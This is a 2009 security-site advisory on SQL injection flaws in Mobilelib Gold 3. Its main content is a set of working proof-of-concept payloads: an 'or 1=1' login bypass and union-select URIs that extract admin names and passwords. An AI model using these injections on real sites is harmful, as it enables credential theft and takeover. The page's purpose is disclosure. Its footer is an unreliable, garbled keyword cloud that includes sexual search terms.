about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Mobilelib Gold Multiple SQL Injection Vulnerabilities


Title Mobilelib Gold Multiple SQL Injection Vulnerabilities
Published 2009-08-01-12:00AM
Updated 2009-08-05-04:34PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  SwEET-DeViL
Vulnerable  Mobilelib Mobilelib GOLD 3
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues.The following proof-of-concept and example URIs are available:username : 'or 1=1/*http://www.example.com/goldv3/artcat.php?cid=-1'+union+select+adminpass,2,adminn,4,5+from+mobilelib_admin/*
http://www.example.com/goldv3/show.php?cat=games&catid=-1'+union+select+1,2,adminpass,4,5,adminn,7,8+from+mobilelib_admin/*
http://www.example.com/goldv3/show.php?cat=pro&catid=-1'+union+select+1,2,adminn,adminpass,5,6,7,8,9+from+mobilelib_admin/*
http://www.example.com/goldv3/show.php?cat=themes&catid=-1'+union+select+1,2,3,4,adminn,adminpass,7+from+mobilelib_admin/*
http://www.example.com/goldv3/show.php?cat=wallpapers&catid=-1'+union+select+1,2,3,4,adminn,adminpass,7+from+mobilelib_admin/*
http://www.example.com/goldv3/show.php?cat=blue&catid=-1'+union+select+1,2,adminpass,4,5,6,7,8+from+mobilelib_admin/*
http://www.example.com/goldv3/show.php?cat=mms&catid=-1'+union+select+1,2,adminpass,4,5,6,7,8+from+mobilelib_admin/*
http://www.example.com/goldv3/show.php?cat=sound&catid=-1'+union+select+1,2,adminpass,4,5,6,7,8,9+from+mobilelib_admin/*
http://www.example.com/goldv3/show.php?cat=vido&catid=-1'+union+select+1,2,adminpass,4,5,6,7,8,9,10+from+mobilelib_admin/*
http://www.example.com/goldv3/show.php?cat=msgs&catid=-1'+union+select+1,2,adminpass,4,5,6,7,8+from+mobilelib_admin/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 12 Dec 2009 04:21:32 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.tipson 200 /compo mambo Remo 1.06 news+for+C phpMyAgen GET /u Crack Data www.statco www.seowww news for c Indian Ido www wptric localhost t39t 200 /compo news for c news for c t299t component% www.orit32 ip www.sexipi saniy search/exp Video simr Worledsex php-...at_ irani sex xpl/exploi www.j131.c convert%2F geirls se Video simr Worledsex www.jabafu i feel mys rendenz components stronghold Asian for Zen Cart. hema malin irani sex reyasen InvisionPo Tagger LE. /search/ex mambo Remo rabsex